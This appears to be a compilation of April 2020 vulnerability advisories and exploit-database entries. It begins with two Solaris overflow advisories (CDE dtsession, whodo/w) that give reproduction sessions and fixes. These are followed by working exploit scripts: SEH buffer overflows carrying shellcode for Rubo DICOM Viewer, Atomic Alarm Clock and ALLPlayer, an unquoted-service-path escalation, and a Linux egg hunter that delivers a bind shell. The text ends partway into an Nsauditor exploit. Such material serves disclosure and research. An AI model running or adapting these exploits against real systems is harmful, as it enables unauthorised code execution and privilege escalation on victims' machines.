our report some additional work has been done by its maintainers to properly
check bounds in the libDtSvc library. Most notably, insecure calls to strncat()
that caused buffer overflows have been fixed.

2. Example Attack Session.

In order to reproduce this bug, the following commands can be used:

bash-3.2$ cat /etc/release
                    Oracle Solaris 10 1/13 s10x_u11wos_24a X86
  Copyright (c) 1983, 2013, Oracle and/or its affiliates. All rights reserved.
                            Assembled 17 January 2013
bash-3.2$ uname -a
SunOS nostalgia 5.10 Generic_147148-26 i86pc i386 i86pc
bash-3.2$ id
uid=54322(raptor) gid=1(other)
bash-3.2$ grep 10.0.0.24 /etc/hosts
10.0.0.24       aaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[activate a valid display on 10.0.0.24:0]
/usr/dt/bin/dtsession -display aaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:0
Segmentation Fault

3. Discussion.

The overflow occurs in the following code snippet of Oracle Solaris CDE (the
Ghidra decompiler is probably doing something wrong as some variables seem to
overlap, however its output is good enough for the purpose of this discussion):

char * _DtCreateDtDirs(int param_1)
{
  ...
  char local_f0 [104];
  char local_88 [112];
  char *heap_path2;
  char *tmp_ptr1;
  char *home;
  undefined *local_c;
  undefined local_8 [4];
  ...
  if (param_1 != 0) {
    strcpy(local_f0,*(char **)(param_1 + 0x80));
    strcpy(local_88,*(char **)(param_1 + 0x80));
  ...
}

An X11 display data structure is passed to the _DtCreateDtDirs() function as
its only parameter (param_1 in the pseudocode above). It contains the X11
display name at offset 0x80. This display name is copied into the stack buffers
local_f0 and local_88 using the insecure function strcpy() twice, therefore two
overflows occur.

Based on the inferred stack layout, the following local variables are
overflowed into before the saved return address can be reached:

heap_path2
tmp_ptr1
home
local_c
local_8

This complicates exploitation, in particular because the heap_path2 and
tmp_ptr1 pointers get in the way. A skilled attacker might be able to overwrite
all variables with safe data and leverage memory corruption to obtain arbitrary
code execution. However, there is an additional challenge: the ability to
control a hostname to be passed in the X11 display name string. In our PoC
above we have edited /etc/hosts, but this is obviously not possible for an
unprivileged local attacker. A DNS server under the control of the attacker may
be used for this purpose, but such an approach would introduce a number of
additional complications.

That said, as a rule of thumb all memory corruption issues have the potential
to become serious security vulnerabilities until otherwise proven. Therefore,
we recommend to treat this bug as a potential security vulnerability and to fix
it as such.

4. Affected Platforms.

All platforms shipping the Common Desktop Environment are potentially affected.
This includes:

* Oracle Solaris 10 1/13 (Update 11) and earlier [default installation]

According to the CDE Wiki, the following platforms are officially supported:

* All Official Ubuntu variants 12.04 - 18.04
* Debian 6, 7, 8, 9
* Fedora 17 at least
* Archlinux
* Red Hat
* Slackware 14.0
* OpenBSD
* NetBSD
* FreeBSD 9.2, 10.x, 11.x
* openSUSE Tumbleweed (gcc7)
* openSUSE Leap 4.2 (gcc4)
* SUSE 12 SP3 (gcc4)
* Solaris, OpenIndiana

5. Fix.

The maintainers of the open source CDE 2.x version have issued the following
patches:
https://sourceforge.net/p/cdesktopenv/mailman/message/36900154/
https://sourceforge.net/p/cdesktopenv/code/ci/6b32246d06ab16fd7897dc344db69d0957f3ae08/

Oracle, which maintains a different CDE codebase based on the 1.x train, has
assigned the tracking# S1240932 and has released a fix for all affected and
supported versions of Solaris in the Critical Patch Update (CPU) of April 2020.

As a workaround, it is also possible to remove the setuid bit from the
vulnerable executable as follows (note that this might prevent it from working
properly):

bash-3.2# chmod -s /usr/dt/bin/dtsession

Please note that during the audit many other potentially exploitable bugs have
surfaced in libDtSvc and in the Common Desktop Environment in general.
Therefore, removing the setuid bit from all CDE binaries is recommended,
regardless of patches released by vendors.

Copyright (c) 2020 Marco Ivaldi and @Mediaservice.net. All rights reserved.

@Mediaservice.net Security Advisory #2020-07 (last updated on 2020-04-15)

         Title:  Heap-based buffer overflow in Solaris whodo and w commands
   Application:  Setuid root whodo and w binaries distributed with Solaris
     Platforms:  Oracle Solaris 11.x (confirmed on 11.4 X86)
    Oracle Solaris 10 (confirmed on 10 1/13 X86)
    Other platforms are potentially affected (see below)
   Description:  A difficult to exploit heap-based buffer overflow in setuid
    root whodo and w binaries distributed with Solaris allows
    local users to corrupt memory and potentially execute arbitrary
    code in order to escalate privileges
        Author:  Marco Ivaldi <marco.ivaldi@mediaservice.net>
 Vendor Status:  <secalert_us@oracle.com> notified on 2019-08-23
      CVE Name:  CVE-2020-2771
   CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N (Base Score: 2.5)
    References: https://github.com/0xdea/advisories/blob/master/2020-07-solaris-whodo-w.txt
    https://www.oracle.com/security-alerts/cpuapr2020.html
    https://www.oracle.com/technetwork/server-storage/solaris11/
    https://github.com/illumos/illumos-gate/blob/61aaa916808c601f9ee36d96c05ee9dac211d09e/usr/src/cmd/whodo/whodo.c
    https://github.com/illumos/illumos-gate/blob/61aaa916808c601f9ee36d96c05ee9dac211d09e/usr/src/cmd/w/w.c
    https://www.mediaservice.net/
    https://0xdeadbeef.info/

1. Abstract.

A difficult to exploit heap-based buffer overflow in setuid root whodo and w
binaries distributed with Solaris allows local users to corrupt memory and
potentially execute arbitrary code in order to escalate privileges.

2. Example Attack Session.

In order to reproduce this bug, the following commands can be used:

raptor@stalker:~$ cat /etc/release
                             Oracle Solaris 11.4 X86
  Copyright (c) 1983, 2018, Oracle and/or its affiliates.  All rights reserved.
                            Assembled 16 August 2018
raptor@stalker:~$ uname -a
SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
raptor@stalker:~$ id
uid=100(raptor) gid=10(staff)
raptor@stalker:~$ cp /usr/bin/sleep AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
raptor@stalker:~$ exec -a '- BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB' ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 256 &
[switch to another shell]
raptor@stalker:~$ whodo -l # or w
 12:43pm  up 5 day(s), 20 hr(s), 36 min(s)  5 user(s)
User     tty           login@  idle   JCPU   PCPU  what
raptor   vt/7         Tue 2pm 6days   1:49   1:49  /usr/lib/tracker-miner-apps
Segmentation Fault

3. Discussion.

A detailed analysis of the buffer overflow in whodo follows. The w binary is
also affected by this bug, because the two programs share a large portion of
their codebase. Therefore, similar considerations apply to w.

The overflow happens as follows (the Illumos source code available on GitHub
has been used as a reference for this analysis, even though it doesn't exactly
match the code of the binaries shipped with commercial Solaris versions):

* The psinfo structure info is populated by reading /proc/<pid>/psinfo
* The char array info.pr_fname[16] is copied into the char array
  up->p_comm[80+1]
* As a side note, the call to strncpy() at lines 344-345 incorrectly uses the
  size of the source buffer instead of the size of the destination buffer, but
  in this case this programming mistake doesn't cause a problem, because the
  source buffer is always smaller than the destination buffer:
  (void) strncpy(up->p_comm, info.pr_fname,
    sizeof (info.pr_fname));
* The char array up->p_args[80+1] is then populated at line 418 based on the
  char array info.pr_psargs[80] as follows:
  (void) strcpy(up->p_args, info.pr_psargs);
* If up->p_args begins with "?" or "- " (or, more correctly, with "-" followed
  by any byte <= 0x20), the following code branch at lines 423-425 is taken:
  (void) strcat(up->p_args, " (");
  (void) strcat(up->p_args, up->p_comm);
  (void) strcat(up->p_args, ")");
* In detail, the following chars are appended to the string:
" (" + up->p_comm [maximum size excluding NULL-terminator is 15] + ")" + NULL
* Therefore, it is possible to overflow the up->p_args buffer at most as
  follows:
  * Buffer is 81 bytes: "- " + "B"x77 + " ("
  * Overflow is 17 bytes: "A"x15 + ")" + NULL

The uproc structure is declared at lines 106-119:
struct uproc {
  pid_t  p_upid;      /* user process id */
  char  p_state;    /* numeric value of process state */
  dev_t  p_ttyd;      /* controlling tty of process */
  time_t  p_time;      /* ticks of user & system time */
  time_t  p_ctime;    /* ticks of child user & system time */
  int  p_igintr;    /* 1=ignores SIGQUIT and SIGINT */
  char  p_comm[PRARGSZ+1];  /* command */
  char  p_args[PRARGSZ+1];  /* command line arguments */
  struct uproc  *p_child,  /* first child pointer */
      *p_sibling,  /* sibling pointer */
      *p_pgrplink,  /* pgrp link */
      *p_link;  /* hash table chain pointer */
};

A 17 bytes overflow past the p_args buffer is not large enough to reach
critical control structures and directly take control of the program flow.
However, we are able to overflow into the p_child and p_sibling members of the
uproc structure up, assuming 64-bit addressing. With 32-bit addressing we
should be able to corrupt additional pointers, i.e. p_pgrplink and p_link.

A skilled attacker might be able to leverage the corruption of these pointers
to obtain arbitrary code execution. However, he or she would face a number of
additional challenges:

* The target program uses privilege bracketing with the PRIV_PROC_OWNER
  privilege. This privilege allows a process to send signals to other
  processes, inspect, and potentially modify (with some additional
  restrictions) the process state in other processes, regardless of ownership.
  Therefore, it's theoretically possible to write a shellcode that activates
  the privilege and dumps the memory of a privileged process (e.g. "passwd")
  via /proc/<pid>/mem, without ever executing an actual shell. However, this
  must be done before privileges are relinquinshed at line 455. This leaves
  only a limited amount of code paths to leverage our corrupted structure
  (namely, the main loop through /proc starting at line 315 and ending at line
  452).
* The char array info.pr_psargs[80] is cleaned up by the clnarglist() function
  at line 417: non-printable ASCII chars (c < 0x20 and c > 0x7e) get replaced
  with a "?" and must therefore be considered badchars. Luckily this
  restriction does not apply to the part of the buffer that causes the actual
  overflow, but only bytes that are valid in file names can be used in our
  malicious buffer.
* The ")" + NULL chars at the end of the evil buffer might cause unforeseen
  problems during exploitation.
* Additional security measures such as Address Space Layout Randomization
  (ASLR) might get in the way of reliable exploitation.

Based on this analysis, our conclusion is that this bug not exploitable on
Solaris 11.x and 10 in order to escalate privileges. That said, as a rule of
thumb all memory corruption issues have the potential to become serious
security vulnerabilities until otherwise proven. For instance, it might very
well be possible to exploit this bug on systems that don't implement privilege
bracketing, such as Solaris 9 and earlier. Therefore, we recommend to treat
this bug as a potential security vulnerability and to fix it as such.

4. Affected Platforms.

This bug was confirmed on the following platforms:

* Oracle Solaris 11.x (confirmed on 11.4 X86)
* Oracle Solaris 10 (confirmed on 10 1/13 X86)

Other Oracle Solaris versions (including those that run on the SPARC
architecture) and Illumos distributions are also likely affected.

5. Fix.

Oracle has assigned the tracking# S1199548 and has released a fix for all
affected and supported versions of Solaris in the Critical Patch Update (CPU)
of April 2020.

As a temporary workaround, it is possible to remove the setuid bit from whodo
and w executables as follows (note that this might prevent them from working
properly):

bash-3.2# chmod -s /usr/sbin/whodo /usr/bin/w

Copyright (c) 2020 Marco Ivaldi and @Mediaservice.net. All rights reserved.

#Exploit Title: Atomic Alarm Clock (x86) - Local Privilege Escalation
#Exploit Author: Bobby Cooke
#Date: 04/17/2020
#Vendor Homepage: http://www.drive-software.com
#Software Link: http://www.drive-software.com/download/ataclock.exe
#Version: 6.3
#Tested On: Windows 10 Pro 1909 (32-bit)
#Vulnerability Type: 
  Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
#Vulnerability Description:
  The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution. Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.

C:\Users\boku>sc qc AtomicAlarmClock
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AtomicAlarmClock
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Atomic Alarm Clock\timeserv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Atomic Alarm Clock Time
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Date: 2020-04-17
# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
# Vendor Homepage: http://www.rubomedical.com/
# Version: 2.0
# Software Link : http://www.rubomedical.com/download/index.php
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate overview.txt, copy contents to clipboard
# 2. open application
# 3. select send dicom files, edit
# 4. paste contents from clipBoard to "DICOM server name" field
# 6. pop calc

#!/usr/bin/python

import struct

junk1 = "A"*1868

#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
seh = struct.pack('<L',0x00402f0e)

jmp1 = "\xeb\xf8\xcc\xcc"

jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
#Payload size: 220 bytes
calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")

junk2 = "\x90"*14

buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh 

with open("overview.txt","wb") as f:
    f.write(buffer[:-1])

# Exploit Title: Atomic Alarm Clock 6.3 - Venetian Blinds Zipper - Unicode SEH Stack Overflow
# Exploit Author: Bobby Cooke
# Date: April 17th, 2020
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer

File    = 'poc.txt'

os_nSEH = '\x41'*(461)
nSEH    = '\xeb\x05'   # jmp short +2
SEH     = '\x47\x47'   # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe] 
#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False 

getPC   = '\x73'   # add [ebx], dh   # nop | [EBX] = writable memory 
getPC  += '\x61'   # popad           # [ESP] = &Payload
getPC  += '\x72'   # add [edx], dh   # realigns execution for 1 byte opcodes

ebx2eax  = '\x58'  # pop eax         # EAX = &Payload
ebx2eax += '\x72'  # add [edx], dh

# Ajust EAX to &Decoder
getDecoder  = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += '\x72'         # add [edx], dh
getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += '\x72'         # add [edx], dh
getDecoder += '\x50'         # push eax            # [ESP] = &Decoder
getDecoder += '\x72'         # add [edx], dh

#DecoderHex  = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf   = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
## 2nd byte - \x00 => \x5F
venBlinds   = '\x40\x72\xC6\x5F\x72\x40\x72\x40\x72'
## 4th byte - \x00 => \x33
venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'
## 6th byte - \x00 => \x33
venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'
## 8th byte - \x00 => \x66
venBlinds  += '\xC6\x66\x72\x40\x72\x40\x72'
## 10th byte - \x00 => \x10
venBlinds  += '\xC6\x10\x72\x40\x72\x40\x72'
## 12th byte - \x00 => \x33
venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'
## 14th byte - \x00 => \x42
venBlinds  += '\xC6\x42\x72\x40\x72\x40\x72'
## 16th byte - \x00 => \x32
venBlinds  += '\xC6\x32\x72\x40\x72\x40\x72'
## 18th byte - \x00 => \x02
venBlinds  += '\xC6\x02\x72\x40\x72\x40\x72'
## 20th byte - \x00 => \x10
venBlinds  += '\xC6\x10\x72\x40\x72\x40\x72'
## 22nd byte - \x00 => \x3F
venBlinds  += '\xC6\x3F\x72\x40\x72\x40\x72'
## 24nd byte - \x00 => \x1F
venBlinds  += '\xC6\x1F\x72\x40\x72\x40\x72'
## 26th byte - \x00 => \x49
venBlinds  += '\xC6\x49\x72\x40\x72\x40\x72'
## 28th byte - \x00 => \x02
venBlinds  += '\xC6\x02\x72\x40\x72\x40\x72'
## 30th byte - \x00 => \xED
venBlinds  += '\xC6\xED\x72\x40\x72\x40\x72'
## 32nd byte - \x00 => \xC3
venBlinds  += '\xC6\xC3\x72\x40\x72'
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds  += '\xC3'         #   ret  [!] Now we are executing the decoder!

os_decoder   = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))

# Custom PopCalc shellcode that avoids the bad characters
fKernel32  = '\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08'

gExpotTbl  = '\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'

fWinExec   = '\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C'

# Call WinExec( CmdLine, ShowState );
#   CmdLine   = "calc.exe"
#   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec  = '\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3'

shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec

buffer      = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler      = '\x77'*(9000-len(buffer))
buffer      = buffer+filler

try:
    payload   = buffer
    f         = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'

/*
# Title: Linux/x86 - EggHunter + Null-Free Shellcode (33 Bytes)
# Author: Shubham Singh
# Tested on: x86 GNU/Linux
# Shellcode Length: 33 Bytes
#Student ID: SLAE - 1342

#Description: Null-Free Egg Hunter Shellcode - 33 Bytes
#file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
 8048060:       eb 05                   jmp    8048067 <next_addr>

08048062 <page_allignment>:
 8048062:       66 81 c9 ff 0f          or     $0xfff,%cx

08048067 <next_addr>:
 8048067:       31 c0                   xor    %eax,%eax
 8048069:       41                      inc    %ecx
 804806a:       b0 43                   mov    $0x43,%al
 804806c:       cd 80                   int    $0x80

0804806e <check_if_efault>:
 804806e:       3c f2                   cmp    $0xf2,%al
 8048070:       74 f0                   je     8048062 <page_allignment>

08048072 <check_if_egg>:
 8048072:       b8 ef be ad de          mov    $0xdeadbeef,%eax
 8048077:       89 cf                   mov    %ecx,%edi
 8048079:       af                      scas   %es:(%edi),%eax
 804807a:       75 eb                   jne    8048067 <next_addr>
 804807c:       af                      scas   %es:(%edi),%eax
 804807d:       75 e8                   jne    8048067 <next_addr>
 804807f:       ff e7                   jmp    *%edi

POC:
1. ➜  gcc -fno-stack-protector -z execstack shellcode1.c -o shellcode1 
2. ➜  ./shellcode1
Length of Egg Hunter Shellcode:  33
Shellcode length: 102

3. Open new terminal and type
➜  nc 127.0.0.1 1337
ls
bind_shell
bind_shell.nasm
bind_shell.o
egghunter_shellcode
egghunter_shellcode.nasm
egghunter_shellcode.o


*/
#include<stdio.h>
#include<string.h>
#define EGG "\xef\xbe\xad\xde"
unsigned char egg_search[] = \
"\xeb\x05\x66\x81\xc9\xff\x0f\x31\xc0\x41\xb0\x43\xcd\x80\x3c\xf2\x74\xf0\xb8\xef\xbe\xad\xde\x89\xcf\xaf\x75\xeb\xaf\x75\xe8\xff\xe7";
unsigned char code[]= \
EGG
EGG
"\x31\xc0\x31\xdb\x99\xb0\x66\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x31\xc0\xb0\x66\x43\x52\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\x49\xb0\x3f\xcd\x80\x79\xf9\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
main()
{
  printf("Length of Egg Hunter Shellcode:  %d\n", strlen(egg_search));
  printf("Shellcode length: %d\n", strlen(code));
  int (*ret)()=(int (*)())egg_search;
  ret();
}

# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)
# Version: 7.6
# Date: 20-04-2020
# Exploit Author: Xenofon Vassilakopoulos
# Tested on: Windows 7 Home Premium SP1 x86

# Steps to reproduce :
# 1. generate the test.m3u using this exploit 
# 2. open ALLPlayer then go to Open audio file 
# 3. load the test.m3u file 
# 4. calc

filename = "test.m3u"

junk="A"*301

nseh = "\x61\x6e" # popad align
seh = "\x12\x74"  # pop ebx # pop ebp # ret 0x04 


align=("\x56"           # push esi
"\x6e"           # venetian shellcode
"\x58"           # pop eax
"\x6e"           # venetian shellcode
"\x05\x19\x11"   # add eax,0x11001900
"\x6e"       # venetian shellcode 
"\x2d\x16\x11"   # sub eax,0x11001600
"\x6e"       # venetian shellcode 
"\x50"       # push eax
"\x6e"       # venetian shellcode 
"\xc3"       # retn
     )

nop="\x90"*45

# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode=  b""
shellcode+= b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode+= b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode+= b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode+= b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode+= b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode+= b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode+= b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode+= b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode+= b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode+= b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x69\x58\x62\x62"
shellcode+= b"\x49\x70\x69\x70\x4d\x30\x71\x50\x63\x59\x48\x65\x6e"
shellcode+= b"\x51\x57\x50\x52\x44\x54\x4b\x32\x30\x6e\x50\x54\x4b"
shellcode+= b"\x72\x32\x6a\x6c\x54\x4b\x70\x52\x6d\x44\x72\x6b\x61"
shellcode+= b"\x62\x6f\x38\x4a\x6f\x45\x67\x4e\x6a\x6d\x56\x4d\x61"
shellcode+= b"\x69\x6f\x34\x6c\x4f\x4c\x51\x51\x53\x4c\x79\x72\x4c"
shellcode+= b"\x6c\x6d\x50\x66\x61\x58\x4f\x4c\x4d\x59\x71\x67\x57"
shellcode+= b"\x38\x62\x39\x62\x62\x32\x6e\x77\x74\x4b\x4e\x72\x4c"
shellcode+= b"\x50\x34\x4b\x50\x4a\x4f\x4c\x72\x6b\x30\x4c\x4e\x31"
shellcode+= b"\x51\x68\x38\x63\x61\x38\x79\x71\x36\x71\x70\x51\x62"
shellcode+= b"\x6b\x71\x49\x6b\x70\x69\x71\x66\x73\x54\x4b\x31\x39"
shellcode+= b"\x6c\x58\x37\x73\x6e\x5a\x6e\x69\x32\x6b\x6e\x54\x64"
shellcode+= b"\x4b\x5a\x61\x59\x46\x50\x31\x49\x6f\x74\x6c\x69\x31"
shellcode+= b"\x48\x4f\x6a\x6d\x7a\x61\x59\x37\x70\x38\x59\x50\x61"
shellcode+= b"\x65\x4a\x56\x4c\x43\x71\x6d\x4c\x38\x6d\x6b\x43\x4d"
shellcode+= b"\x4f\x34\x42\x55\x67\x74\x31\x48\x44\x4b\x32\x38\x4c"
shellcode+= b"\x64\x6b\x51\x5a\x33\x61\x56\x62\x6b\x6c\x4c\x6e\x6b"
shellcode+= b"\x44\x4b\x6f\x68\x4b\x6c\x7a\x61\x6a\x33\x64\x4b\x6b"
shellcode+= b"\x54\x52\x6b\x49\x71\x36\x70\x42\x69\x4e\x64\x6b\x74"
shellcode+= b"\x6f\x34\x6f\x6b\x61\x4b\x51\x51\x72\x39\x4f\x6a\x4f"
shellcode+= b"\x61\x59\x6f\x47\x70\x71\x4f\x4f\x6f\x4e\x7a\x32\x6b"
shellcode+= b"\x6e\x32\x4a\x4b\x52\x6d\x61\x4d\x72\x4a\x6a\x61\x32"
shellcode+= b"\x6d\x42\x65\x75\x62\x49\x70\x79\x70\x4b\x50\x62\x30"
shellcode+= b"\x52\x48\x4d\x61\x72\x6b\x42\x4f\x35\x37\x49\x6f\x4a"
shellcode+= b"\x35\x37\x4b\x6c\x30\x64\x75\x53\x72\x61\x46\x31\x58"
shellcode+= b"\x45\x56\x56\x35\x45\x6d\x33\x6d\x49\x6f\x59\x45\x4f"
shellcode+= b"\x4c\x59\x76\x73\x4c\x6a\x6a\x75\x30\x69\x6b\x47\x70"
shellcode+= b"\x30\x75\x7a\x65\x35\x6b\x4e\x67\x7a\x73\x50\x72\x52"
shellcode+= b"\x4f\x6f\x7a\x69\x70\x30\x53\x49\x6f\x6a\x35\x51\x53"
shellcode+= b"\x70\x61\x32\x4c\x6f\x73\x49\x70\x41\x41"

payload=junk+nseh+seh+align+nop+shellcode

fill="D"*(5000-len(payload))

payload+=fill
f=open(filename,"wb")
f.write('http://'+payload)
print "\nFile created with %d bytes" % len(payload)
f.close()

# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
# Date: 2020-04-17
# Exploit Author: Cervoise
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.1.0 and 3.0.28
# Tested on: Windows 10.0.18363.778 x86 Pro EN

# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES 
(https://www.exploit-db.com/exploits/46005)
# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still 
vulnerable

# 1 -> Change the shellcode with the one you want
